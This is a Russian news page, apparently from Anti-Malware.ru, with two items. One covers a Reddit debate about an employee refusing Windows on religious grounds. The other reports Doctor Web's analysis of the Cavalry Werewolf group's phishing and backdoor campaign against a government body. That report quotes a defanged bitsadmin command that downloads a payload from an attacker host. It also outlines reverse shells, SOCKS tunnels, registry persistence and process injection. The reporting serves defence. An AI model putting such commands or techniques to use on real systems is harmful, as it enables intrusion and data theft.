Религия помогает отказаться от использования Windows

Религия помогает отказаться от использования Windows

Религия помогает отказаться от использования Windows

На площадке Reddit прокатилась волна обсуждений необычного случая, связанного с отказом от работы в Microsoft Windows «по религиозным соображениям». Именно такое условие поставил новый сотрудник в одной компании, потребовавший перенастроить корпоративный ноутбук и установить операционную систему на базе Linux.

Обоснование — «моя религия не позволяет использовать операционные системы, принадлежащие Apple или Microsoft».

Такое требование поставило в тупик руководителя, который запустил обсуждение в Reddit. Он написал, что проблема возникла на этапе тестового периода. Сам руководитель высоко оценивал своего нового сотрудника, его знания и опыт.

 

Руководитель отметил в своем комментарии, что в настоящее время «у компании есть только аппаратные конфигурации для macOS / Windows. Поэтому де-факто было принято, что новая сотрудница «будет использовать Windows вместе с остальной частью команды». Но соискатель заявила, что «может выполнять все рабочие обязанности и без Windows».

Обсуждающие в Reddit разделились на два лагеря. Противники резко заявили, что новой сотруднице можно легко отказать, заявив, что ее «религиозные убеждения» слишком дорого обойдутся компании. «Установка отдельной операционной системы и поддержка ее безопасности — это больше, чем минимальные затраты».

«Подобные требования не имеют юридической силы. ИТ-затраты на поддержку совершенно разных операционных систем, а также потенциальный риск киберпреступлений / мошенничества в случае появления в корпоративной системе другой ОС, для которой не предоставляется поддержка, являются необоснованными».

Выслушав подобные реплики, автор поста заявил, что готов пойти на ультиматум и отказать сотруднице. Но джин уже был выпущен из бутылки. Обсуждение в Reddit резко переметнулось к вопросу, какие религиозные основания запрещают людям использовать Microsoft и Apple.

Главным аргументом стало то, что «в мире работают миллионы глючных устройств под управлением Windows». Конечно, сразу же вспомнили про «забагованные» киоски McDonald's — все они работают на Windows (по крайней мере, в Канаде).

Нашлись знатоки, утверждающие, что в мире существуют несколько сект в разных религиях (иудаизм, христианство, ислам), которые твердо придерживаются идеи, что нельзя использовать продукты, которые были созданы людьми, позицию которых не разделяют секты. Например, отношение к извлечению материальной выгоды. «Поскольку Linux бесплатен, то никто не получает выгоды от его использования».

Вспомнили также про пародийную церковь The Church of Emacs, основанную Ричардом Столменом для «пользователей Emacs». Сам Столмен стал там святым по имени «St I GNU cius».

Нашлись в Reddit читатели, которые заявили, что замена Windows на Linux на корпоративном ноутбуке не влечет за собой появление дыр в системе безопасности предприятия. Этот вопрос может касаться только непрерывности бизнеса, когда из-за разных ОС могут возникнуть проблемы с перекодированием текстов. Но эта проблема легко решается. Они также встали на защиту нового сотрудника, объявив, что «более 98 % корпоративной Америки работает на Linux — практически каждый сервер инфраструктуры, все облака, даже домашние Wi-Fi-роутеры».

«В настоящее время я работаю в InfoSec. Linux гораздо более безопасен, чем Windows. Машины с Windows в настоящее время являются одним из главных векторов для взлома. Кроме того, большинство серверов, к которым вы обращаетесь, работают под управлением Linux».

Такой вердикт этой необычной истории. Была ли уволена «нерадивая» сотрудница, не сообщается.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru